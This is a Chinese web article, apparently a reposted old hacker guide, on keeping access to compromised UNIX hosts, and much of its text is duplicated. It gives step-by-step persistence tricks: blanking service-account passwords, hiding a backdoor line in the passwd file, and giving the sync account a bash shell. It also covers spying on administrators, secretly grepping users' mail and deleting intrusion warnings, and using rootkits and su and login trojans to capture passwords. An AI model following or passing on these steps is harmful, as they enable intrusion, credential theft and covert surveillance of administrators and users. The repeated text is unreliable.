從UNIX系統(tǒng)獲取密碼檔(三)
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 19:04:35 作者:佚名
我要評論

一些訣竅
Root和Demon的工具包及特洛伊木馬
--------------------------------------------------------------------------------
保持訪問權(quán)限的方法有很多。雖然在你學(xué)習(xí)本文時,可能正將要失去在某些主機上
的訪問權(quán)限,但我希望本文中的一些經(jīng)驗可以
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
以上這些已足夠我們使用了,因此我只列出這些用戶。
1. 查看用戶operator、ftp和postmaster,所有這些帳號都可以執(zhí)行shell,而且沒有設(shè)
置密碼。在你的shell中輸入:
passwd postmaster
回車(entern)以設(shè)置其密碼為空。這樣,你就能在任何時候用這個帳號登錄,
同時也不會引起引起系統(tǒng)管理員的懷疑。
2. 在passwd檔中加入下面一行:
syst::13:12:system:/var/spool:/bin/bash
將該行放入文件內(nèi)部(不會引起注意)。在密碼部分::可以不進行設(shè)置,或者在
root shell中鍵入passwd syst以輸入新密碼。組和用戶id可以隨意設(shè)置。
3. 查看sync用戶一行:
sync:*:5:0:sync:/sbin:/bin/sync
將其修改為:
sync:*:5:0:sync:/sbin:/bin/bash
然后運行
將密碼設(shè)置為空(或其他)。在這個賬號中g(shù)id=0。;-)
安裝游戲
----------------
如果系統(tǒng)中裝中游戲,你也可以安裝一些可以利用的游戲,如doom、abuse。在附錄
中有可以利用這些游戲取得root權(quán)限的程序。
保持監(jiān)視
------------------
總是要知道系統(tǒng)中的管理員是誰。如何如何發(fā)現(xiàn)他們呢?可以查看passwd檔中的
用戶根目錄、用戶id、用戶組或者閱讀bash_history文件查看使用管理員命令的用戶。
你還可以從這些歷史文件中學(xué)到新的命令,不過,主要還是要知道誰在這個系統(tǒng)里。
一定要很熟悉你正在使用的系統(tǒng);用su : 查找用戶;瀏覽log文件以查看誰在使用管理
員命令。
對系統(tǒng)保持監(jiān)視。當(dāng)你在系統(tǒng)中時,要注意別人。查看管理員命令歷史記錄,看看
他們在使用什么命令:tty端口監(jiān)聽?過多的ps命令?在ps或w或who命令后跟著finger
命令說明他們正在監(jiān)視系統(tǒng)中其他用戶。監(jiān)視系統(tǒng)管理員,并要留意他們對系統(tǒng)中用戶
有多少了解。
閱讀系統(tǒng)郵件
首先要記?。簭牟皇褂孟到y(tǒng)郵件程序。否則用戶會知道你閱讀了他們的郵件。我使用
了一些方法來閱讀郵件。現(xiàn)在讓我們來看一看:
1. cd /var/spool/mail
在此目錄中保存著所有未閱讀郵件和等待中的郵件。我們可以按照以下步驟閱讀
郵件:
grep -i security * |more
grep -i hack * |more
grep -i intruder * |more
grep -i passwd * |more
grep -i password * |more
譬如你想查看pico用戶名,可以鍵入ctrl w來進行搜索。如果你看見有其他系統(tǒng)
管理員有郵件告訴系統(tǒng)管理員你正在使用某用戶名從他們的服務(wù)器上攻擊該系統(tǒng),
你當(dāng)然可以刪除它了。
有一個郵件閱讀器,它允許你閱讀郵件,但并不更新郵件標(biāo)識(是否已讀):
http://obsidian.cse.fau.edu/~fc
在那里有一個工具可以在不改變最后閱讀日期的情況下顯示/var/spool/mail中的郵件。
也就是說,他們(用戶)根本不知道你已閱讀過他們的郵件。
另外要記住,你可以在用戶的目錄下發(fā)現(xiàn)其他系統(tǒng)郵件。一定要檢查/root目錄。
檢查/root/mail或username/mail或其它包含了以前郵件的目錄。
祝你“狩獵”快樂。。。
--------------------------------------------------------------------------------
Root和Demon工具及特洛伊木馬
Root工具是ps、login、netstat的c源程序,有時還有一些已經(jīng)被“黑”過的程序以
供你使用。有了這些工具,就可以更換目標(biāo)主機上的login文件,從而使你能夠不用帳號
就可以在目標(biāo)主機上登錄。
你還可以修改ps,使你在系統(tǒng)管理員使用ps命令時不會暴露,還可以隱藏一些有
明顯含義的可執(zhí)行文件(如“sniff”開始的文件)在運行時的進程。
Demon工具提供了identd、login、demon、ping、su、telnet和socket的黑客程序。
特洛伊木馬是那些可以讓你在某些方面欺騙系統(tǒng)的程序。一個放在系統(tǒng)管理員目
錄下的su木馬程序,只要你改變了他的查找路徑,su木馬程序就能在真正的su程序前首
先運行。在向其提示輸入錯誤密碼,同時刪除木馬程序并保存其密碼到/tmp目錄下。
一個login木馬程序可以將主機上所有的登錄密碼保存在一個文件中。我想你知道
其中的含義了吧。;-)
Demon和Linux root工具的源程序可在附錄VI中找到。
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
以上這些已足夠我們使用了,因此我只列出這些用戶。
1. 查看用戶operator、ftp和postmaster,所有這些帳號都可以執(zhí)行shell,而且沒有設(shè)
置密碼。在你的shell中輸入:
passwd postmaster
回車(entern)以設(shè)置其密碼為空。這樣,你就能在任何時候用這個帳號登錄,
同時也不會引起引起系統(tǒng)管理員的懷疑。
2. 在passwd檔中加入下面一行:
syst::13:12:system:/var/spool:/bin/bash
將該行放入文件內(nèi)部(不會引起注意)。在密碼部分::可以不進行設(shè)置,或者在
root shell中鍵入passwd syst以輸入新密碼。組和用戶id可以隨意設(shè)置。
3. 查看sync用戶一行:
sync:*:5:0:sync:/sbin:/bin/sync
將其修改為:
sync:*:5:0:sync:/sbin:/bin/bash
然后運行
將密碼設(shè)置為空(或其他)。在這個賬號中g(shù)id=0。;-)
安裝游戲
----------------
如果系統(tǒng)中裝中游戲,你也可以安裝一些可以利用的游戲,如doom、abuse。在附錄
中有可以利用這些游戲取得root權(quán)限的程序。
保持監(jiān)視
------------------
總是要知道系統(tǒng)中的管理員是誰。如何如何發(fā)現(xiàn)他們呢?可以查看passwd檔中的
用戶根目錄、用戶id、用戶組或者閱讀bash_history文件查看使用管理員命令的用戶。
你還可以從這些歷史文件中學(xué)到新的命令,不過,主要還是要知道誰在這個系統(tǒng)里。
一定要很熟悉你正在使用的系統(tǒng);用su : 查找用戶;瀏覽log文件以查看誰在使用管理
員命令。
對系統(tǒng)保持監(jiān)視。當(dāng)你在系統(tǒng)中時,要注意別人。查看管理員命令歷史記錄,看看
他們在使用什么命令:tty端口監(jiān)聽?過多的ps命令?在ps或w或who命令后跟著finger
命令說明他們正在監(jiān)視系統(tǒng)中其他用戶。監(jiān)視系統(tǒng)管理員,并要留意他們對系統(tǒng)中用戶
有多少了解。
閱讀系統(tǒng)郵件
首先要記?。簭牟皇褂孟到y(tǒng)郵件程序。否則用戶會知道你閱讀了他們的郵件。我使用
了一些方法來閱讀郵件。現(xiàn)在讓我們來看一看:
1. cd /var/spool/mail
在此目錄中保存著所有未閱讀郵件和等待中的郵件。我們可以按照以下步驟閱讀
郵件:
grep -i security * |more
grep -i hack * |more
grep -i intruder * |more
grep -i passwd * |more
grep -i password * |more
譬如你想查看pico用戶名,可以鍵入ctrl w來進行搜索。如果你看見有其他系統(tǒng)
管理員有郵件告訴系統(tǒng)管理員你正在使用某用戶名從他們的服務(wù)器上攻擊該系統(tǒng),
你當(dāng)然可以刪除它了。
有一個郵件閱讀器,它允許你閱讀郵件,但并不更新郵件標(biāo)識(是否已讀):
http://obsidian.cse.fau.edu/~fc
在那里有一個工具可以在不改變最后閱讀日期的情況下顯示/var/spool/mail中的郵件。
也就是說,他們(用戶)根本不知道你已閱讀過他們的郵件。
另外要記住,你可以在用戶的目錄下發(fā)現(xiàn)其他系統(tǒng)郵件。一定要檢查/root目錄。
檢查/root/mail或username/mail或其它包含了以前郵件的目錄。
祝你“狩獵”快樂。。。
--------------------------------------------------------------------------------
Root和Demon工具及特洛伊木馬
Root工具是ps、login、netstat的c源程序,有時還有一些已經(jīng)被“黑”過的程序以
供你使用。有了這些工具,就可以更換目標(biāo)主機上的login文件,從而使你能夠不用帳號
就可以在目標(biāo)主機上登錄。
你還可以修改ps,使你在系統(tǒng)管理員使用ps命令時不會暴露,還可以隱藏一些有
明顯含義的可執(zhí)行文件(如“sniff”開始的文件)在運行時的進程。
Demon工具提供了identd、login、demon、ping、su、telnet和socket的黑客程序。
特洛伊木馬是那些可以讓你在某些方面欺騙系統(tǒng)的程序。一個放在系統(tǒng)管理員目
錄下的su木馬程序,只要你改變了他的查找路徑,su木馬程序就能在真正的su程序前首
先運行。在向其提示輸入錯誤密碼,同時刪除木馬程序并保存其密碼到/tmp目錄下。
一個login木馬程序可以將主機上所有的登錄密碼保存在一個文件中。我想你知道
其中的含義了吧。;-)
Demon和Linux root工具的源程序可在附錄VI中找到。
相關(guān)文章
- “CMOS密碼”就是通常所說的“開機密碼”,主要是為了防止別人使用自已的計算機,設(shè)置的一個屏障2023-08-01
QQScreenShot之逆向并提取QQ截圖--OCR和其他功能
上一篇文章逆向并提取QQ截圖沒有提取OCR功能, 再次逆向我發(fā)現(xiàn)是可以本地調(diào)用QQ的OCR的,但翻譯按鈕確實沒啥用, 于是Patch了翻譯按鈕事件, 改為了將截圖用百度以圖搜圖搜索.2023-02-04- QQ截圖是我用過的最好用的截圖工具, 由于基本不在電腦上登QQ了, 于是就想將其提取出獨立版目前除了屏幕錄制功能其他都逆出來了, 在此分享一下2023-02-04
非系統(tǒng)分區(qū)使用BitLocker加密導(dǎo)致軟件無法安裝的解決方法
很多電腦用戶在考慮自己電腦磁盤分區(qū)安全時會采用 Windows 自帶的 BitLocker 加密工具對電腦磁盤分區(qū)進行加密。但有些人加密后就會忘記自己設(shè)置的密碼從而導(dǎo)致在安裝其它軟2020-11-25防止離職員工帶走客戶、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生
這篇文章為大家詳細介紹了如何才能防止離職員工帶走客戶、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生,具有一定的參考價值,感興趣的小伙伴們可以參考一下2017-06-27徹底防止計算機泄密、重要涉密人員離職泄密、涉密人員離崗離職前防范舉
近些年企業(yè)商業(yè)機密泄漏的事件屢有發(fā)生,這篇文章主要教大家如何徹底防止計算機泄密、重要涉密人員離職泄密、告訴大家涉密人員離崗離職前的防范舉措,具有一定的參考價值,2017-06-27- 最近有電腦用戶反應(yīng)量子計算機可以破解下載的所有的加密算法嗎?其實也不是不可以,下面虛擬就為大家講解買臺量子計算機,如何分分鐘破解加密算法2016-09-26
怎么破解Webshell密碼 Burpsuite破解Webshell密碼圖文教程
webshell是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,一種網(wǎng)頁后門。黑客通常會通過它控制別人網(wǎng)絡(luò)服務(wù)器,那么怎么破解webshell密碼呢?一起來看看吧2016-09-19- 本文討論了針對Linux系統(tǒng)全盤加密的冷啟動攻擊,大家都認(rèn)為這種攻擊是可行的,但執(zhí)行這么一次攻擊有多難?攻擊的可行性有多少呢?需要的朋友可以參考下2015-12-28
防止泄露公司機密、企業(yè)數(shù)據(jù)防泄密軟件排名、電腦文件加密軟件排行
面對日漸嚴(yán)重的內(nèi)部泄密事件,我們?nèi)绾问刈o企業(yè)的核心信息,如何防止內(nèi)部泄密也就成了擺在各個企業(yè)領(lǐng)導(dǎo)面前的一大問題。其實,針對內(nèi)網(wǎng)安全,防止內(nèi)部信息泄漏早已有了比較2015-12-17